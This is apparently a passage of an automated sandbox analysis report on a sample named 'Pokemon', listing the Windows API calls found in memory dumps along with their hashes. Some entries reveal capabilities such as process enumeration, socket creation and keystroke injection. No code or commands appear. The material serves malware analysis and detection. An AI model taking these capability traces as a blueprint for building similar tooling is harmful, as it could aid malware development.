                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: acad529ae0ac5ab7b03c8b5a09a469a20625d8e329f984d721a7e69576642008
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B9C13B75A0020AEFDB14CF94C894ABEB7B5FF48704F148598E605AB652D731EE81DB90
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                                                                      • Instruction ID: bd2e756a4441d553fc9832b5206ff3de370cd095bac4499458d8ccacb3ce3fc9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41A14971D003869FEB25CF58C8A2FAEBBE5FF65314F2441ADE9959B242C3389941C750
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00130BD4,?), ref: 000F0EE0
                                                                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00130BD4,?), ref: 000F0EF8
                                                                                                                                                                                                                                                                                      • CLSIDFromProgID.OLE32(?,?,00000000,0012DCE0,000000FF,?,00000000,00000800,00000000,?,00130BD4,?), ref: 000F0F1D
                                                                                                                                                                                                                                                                                      • _memcmp.LIBVCRUNTIME ref: 000F0F3E
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 314563124-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 411368cc9181b1261814f2c9b54d09bdad8a922fc458343ff9dd755f69d96118
                                                                                                                                                                                                                                                                                      • Instruction ID: d915c98d816bd4bafe1d2a20a9cecae9bee965b8f04cebf037b139863391f152
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 411368cc9181b1261814f2c9b54d09bdad8a922fc458343ff9dd755f69d96118
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 19813A71A00109EFCB10DF94C984EEEB7B9FF89315F204558F606AB251DB71AE06DB60
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 0011B10C
                                                                                                                                                                                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0011B11A
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009B329: _wcslen.LIBCMT ref: 0009B333
                                                                                                                                                                                                                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 0011B1FC
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0011B20B
                                                                                                                                                                                                                                                                                        • Part of subcall function 000AE36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,000D4D73,?), ref: 000AE395
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1991900642-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 1763a9bd0433bee7bfaa0372dab6965bd688585dc54f8436bc28ca5e81989188
                                                                                                                                                                                                                                                                                      • Instruction ID: bf4a9f9a4ac119bea9f1205c8860540f85d44f40400d71a6bc327a3a4d7d4cf0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1763a9bd0433bee7bfaa0372dab6965bd688585dc54f8436bc28ca5e81989188
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C514E71508300AFD710EF24D886A9FBBE8FF89754F40492DF58997252EB70E945CB92
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 79323f24de3e3bca3ff38ba8f07c6e262b1c29b2e2323cc672dac385c3c3bc11
                                                                                                                                                                                                                                                                                      • Instruction ID: 06d2db95f8edbcd5805b04028ab6e959ae99459d380c458c7e2d7deabf442207
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 79323f24de3e3bca3ff38ba8f07c6e262b1c29b2e2323cc672dac385c3c3bc11
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C41E731A04301BADB31ABB99C85AFE3AF5EF45720F140627F818D73A2DE35484166B1
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 0011255A
                                                                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 00112568
                                                                                                                                                                                                                                                                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 001125E7
                                                                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 001125F1
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast$socket
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1881357543-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 65cfc605fe4928dccce0945c544490d918c419d75b9314ab3a575736bfbb4ada
                                                                                                                                                                                                                                                                                      • Instruction ID: 7d461abcd3829c8ae4cc018ff748bf791cc38c16a23f6650cf4a118436ac7104
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 65cfc605fe4928dccce0945c544490d918c419d75b9314ab3a575736bfbb4ada
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5341C234A00200AFEB24AF24C886FA677A5AF45758F54C458F9199F2D3D771ED92CB90
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00126D1A
                                                                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00126D4D
                                                                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00126DBA
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3880355969-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 92b782e328943f4fc5e41e110a15f044126e4be79e4899ee4f98147d678978f4
                                                                                                                                                                                                                                                                                      • Instruction ID: 41908af15e58c2767c9a5ea80e8c47db8efaf27c53ba3694f4d214da68f8bb10
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 92b782e328943f4fc5e41e110a15f044126e4be79e4899ee4f98147d678978f4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 77515C35A00219EFCF24DFA4E8809AE7BB6FF94324F218159F9559B290D770ADA1CB50
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 65dafe10ba83fa9882c351288f5b248c7f5a4cb778a7111b0be492303dadecc2
                                                                                                                                                                                                                                                                                      • Instruction ID: 902b41f6e4e65f495b6c27a11005aa5220cd26487978a8c21e1378798ccaa178
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 65dafe10ba83fa9882c351288f5b248c7f5a4cb778a7111b0be492303dadecc2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5441D471A40704AFD725AF78CC42FAEBBE9EF88710F10852EF511DB292DB71A9058790
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 001061C8
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 001061EE
                                                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00106213
                                                                                                                                                                                                                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0010623F
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3321077145-0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,000B70E1,00000000,00000000,000B8649,?,000B8649,?,00000001,000B70E1,8BE85006,00000001,000B8649,000B8649), ref: 000CDC90
                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 000CDD19
                                                                                                                                                                                                                                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 000CDD2B
                                                                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 000CDD34
                                                                                                                                                                                                                                                                                        • Part of subcall function 000C3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,000B6A79,?,0000015D,?,?,?,?,000B85B0,000000FF,00000000,?,?), ref: 000C3BC5
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2652629310-0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 000FB473
                                                                                                                                                                                                                                                                                      • SetKeyboardState.USER32(00000080), ref: 000FB48F
                                                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 000FB4FD
                                                                                                                                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 000FB54F
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 432972143-0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 000FB5B8
                                                                                                                                                                                                                                                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 000FB5D4
                                                                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 000FB63B
                                                                                                                                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 000FB68D
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 432972143-0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • ClientToScreen.USER32(?,?), ref: 001280D4
                                                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0012814A
                                                                                                                                                                                                                                                                                      • PtInRect.USER32(?,?,?), ref: 0012815A
                                                                                                                                                                                                                                                                                      • MessageBeep.USER32(00000000), ref: 001281C6
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1352109105-0
                                                                                                                                                                                                                                                                                      • Opcode ID: d5eb3a9a0f281a387857f0cfa457a431d643e7cd70a51a4c40708b4b1a842ec0
                                                                                                                                                                                                                                                                                      • Instruction ID: 1f1cdd7f1bb8b72190ad5e5722b760e673b569364998e3539551b111867ceed6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d5eb3a9a0f281a387857f0cfa457a431d643e7cd70a51a4c40708b4b1a842ec0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2418F30A02625DFDB15CF58E884AA9B7F5FF85314F1441A8E9549B2A1CB71E8A2CF50
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 00122187
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 000F43AD
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F4393: GetCurrentThreadId.KERNEL32 ref: 000F43B4
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,000F2F00), ref: 000F43BB
                                                                                                                                                                                                                                                                                      • GetCaretPos.USER32(?), ref: 0012219B
                                                                                                                                                                                                                                                                                      • ClientToScreen.USER32(00000000,?), ref: 001221E8
                                                                                                                                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 001221EE
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2759813231-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 8735a38551813511f257e11ca6433eb783b86486e8af110ed04120d7d4ca3e3b
                                                                                                                                                                                                                                                                                      • Instruction ID: 73f68ff586e6b2b1a7eb3ca1cef5bbeaa2db86c7e40072adc67ed1e61a5a3181
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8735a38551813511f257e11ca6433eb783b86486e8af110ed04120d7d4ca3e3b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0D316471D00109AFDB04EFA5C881CEEB7FCEF48304B54846AE515E7212DB719E45DBA0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 000941EA: _wcslen.LIBCMT ref: 000941EF
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 000FE8E2
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 000FE8F9
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 000FE924
                                                                                                                                                                                                                                                                                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 000FE92F
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _wcslen$ExtentPoint32Text
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3763101759-0
                                                                                                                                                                                                                                                                                      • Opcode ID: def9220ce4aca25191972efd34a9d324176e601f2e765cd1030f0bfee08e3aff
                                                                                                                                                                                                                                                                                      • Instruction ID: 4d21e15a102d7867048e20493b051567c6615fabcfef9762695967e3a0b105d1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: def9220ce4aca25191972efd34a9d324176e601f2e765cd1030f0bfee08e3aff
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D21E571D00218AFCB51AFA8D981BFEBBF8EF55750F144065E904BB252D7709E41C7A1
                                                                                                                                                                                                                                                                                      APIs
